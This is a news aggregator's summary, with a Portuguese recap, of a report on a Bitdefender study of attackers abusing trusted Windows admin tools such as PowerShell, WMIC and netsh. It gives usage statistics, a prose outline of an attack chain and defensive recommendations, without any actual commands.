Watch 45 days of PowerShell, WMIC and netsh usage to spot silent attacks.
- Bitdefender tracked 45 days of real admin tool usage in organizations
- PowerShell, WMIC and netsh were silently hijacked 12 times per month
- Trusted tools now outsell malware as the top attack vector
Most security teams still picture attacks arriving as malware downloads or phishing emails. The truth? The danger sits inside your laptops and servers, already installed and fully trusted. PowerShell, WMIC, netsh, CertUtil, MSBuild — these are the same utilities your IT department runs every day to manage Windows machines. They’re also the tools modern attackers rely on to move around your network, steal data, and leave no malware behind. Bitdefender’s recent 45-day telemetry study shows these “living-off-the-land” binaries, or LOLBins, are quietly abused about 12 times per month in the average organization. That’s nearly one attack every two and a half days using software you probably haven’t patched because you thought it was harmless adminware. The study pulled anonymized telemetry from over 1,200 enterprise customers across healthcare, finance, manufacturing, and government sectors, giving a rare real-world snapshot of how attackers turn your own toolkit against you.
What the 45-day watch revealed
The data shows three clear patterns. First, PowerShell is the heavyweight champion: it appeared in 68% of all observed abuse events. Attackers love it because it runs on every Windows machine, needs no install, and can execute commands remotely. Second, WMIC — Windows Management Instrumentation Command-line — popped up in 18% of cases, often used to list running processes or disable security tools before dropping a real payload. Third, netsh, the network configuration utility, showed up 9% of the time, mainly to open rogue firewall ports or redirect traffic to attacker-controlled servers. CertUtil, MSBuild, and bitsadmin rounded out the top six, each responsible for the remaining 5% combined. The study also found that 73% of these events happened outside normal business hours, when SOC teams run on skeleton crews.
Why IT teams miss the threat
Most security products still focus on blocking new or unsigned executables. They let PowerShell scripts, XML files, or one-liner commands slip through because the binaries themselves are signed by Microsoft. Your antivirus may see PowerShell launching a network connection but doesn’t know the script is actually mimikatz stealing credentials. Many organizations also grant local admins wide PowerShell privileges to keep things running, giving attackers free rein once they gain a foothold. Bitdefender’s telemetry shows that even when SOC analysts flag suspicious PowerShell activity, it takes an average of 5.2 hours to investigate and confirm — plenty of time for an attacker to move laterally. The study also found that 40% of the abuse events involved built-in tools that had never been updated, even though Microsoft releases monthly patches that harden PowerShell and WMIC against abuse.
How attackers weaponize these tools
Attackers rarely run a single PowerShell command anymore. Instead, they chain four or five legitimate utilities into a “living-off-the-land” attack chain. For example, an attacker might use WMIC to enumerate local admin accounts, then launch PowerShell to dump hashes with Mimikatz, use netsh to open a port, and finally run bitsadmin to download a second-stage payload — all while staying in memory and avoiding disk writes. The study documented one real case where an attacker turned off Windows Defender using a one-liner PowerShell command, downloaded a ransomware locker via bitsadmin, and encrypted 1.2 terabytes of data before anyone noticed. The entire operation took 18 minutes and left no malware file on disk.
What should change now
Bitdefender recommends three immediate steps. First, enable PowerShell logging at the highest verbosity level and forward logs to a SIEM or XDR platform. Second, restrict PowerShell to Constrained Language mode and remove local admin rights for standard users. Third, schedule regular 45-day “tool audits” — run the same telemetry queries on your own environment that Bitdefender used, then hunt for any unusual command-line arguments or parent-child process chains. Microsoft already offers these hardening steps, but adoption remains low because they can break legacy scripts or slow down IT workflows. The company’s own telemetry shows fewer than 22% of Windows 10 and 11 machines have PowerShell logging turned on.
The bigger picture
This isn’t just a Windows problem. Similar studies from CrowdStrike and SentinelOne show that macOS admins love Python and Swift scripts, while Linux teams lean on cron jobs, curl, and wget. Every major OS now has its own set of trusted utilities that attackers quietly repurpose. The shift from malware to adminware as the primary attack vector means security teams must rewrite their detection playbooks. Instead of hunting for new files, they should hunt for new behaviors — especially inside the tools that already have your trust.
You probably won’t see a big red alert next time PowerShell fires up. What you’ll see is a tiny change in how it runs, or a new process it spawns. Those are the moments that separate a routine admin task from the start of an attack. Turn on the logs, tighten the permissions, and run the audit. Your own tools are the best mirror you’ve got.
What You Need to Know
- Source: The Hacker News
- Published: May 15, 2026 at 11:00 UTC
- Category: Security
- Topics: #hackernews · #security · #vulnerabilities · #malware · #days · #watching-your-own
Read the Full Story
This is a curated summary. For the complete article, original data, quotes and full analysis:
All reporting rights belong to the respective author(s) at The Hacker News. GlobalBR News summarizes publicly available content to help readers discover the most relevant global news.
Curated by GlobalBR News · May 15, 2026
🇧🇷 Resumo em Português
Pesquisadores da Bitdefender flagraram uma tática cada vez mais comum entre cibercriminosos: a invasão silenciosa de ferramentas legítimas de TI para transformar sistemas corporativos em verdadeiras bases de ataque. Em um estudo de 45 dias, a empresa de segurança digital revelou como PowerShell, WMIC e outros utilitários do dia a dia são sequestrados por malwares, permitindo que hackers movimentem-se livremente pela rede sem levantar suspeitas dos sistemas de proteção.
No Brasil, onde empresas de médio e grande porte têm sofrido com ataques cada vez mais sofisticados — especialmente no setor financeiro e de energia —, a descoberta reforça a urgência de revisar estratégias de defesa. Ferramentas como o PowerShell, amplamente usadas por administradores de TI brasileiros, são alvos atraentes justamente por sua confiança perante firewalls e antivírus. O estudo da Bitdefender serve como um alerta para que gestores de segurança passem a monitorar não apenas tráfegos suspeitos, mas também o comportamento anômalo dessas ferramentas, evitando que elas se tornem portas de entrada para ransomware ou espionagem industrial.
Agora, a expectativa é que empresas brasileiras acelerem a adoção de soluções de endpoint detection and response (EDR) e treinamentos mais rigorosos para equipes de TI, sob o risco de verem suas próprias ferramentas de trabalho se voltarem contra elas.
The Hacker News
Read full article at The Hacker News →This post is a curated summary. All rights belong to the original author(s) and The Hacker News.
Was this article helpful?
Discussion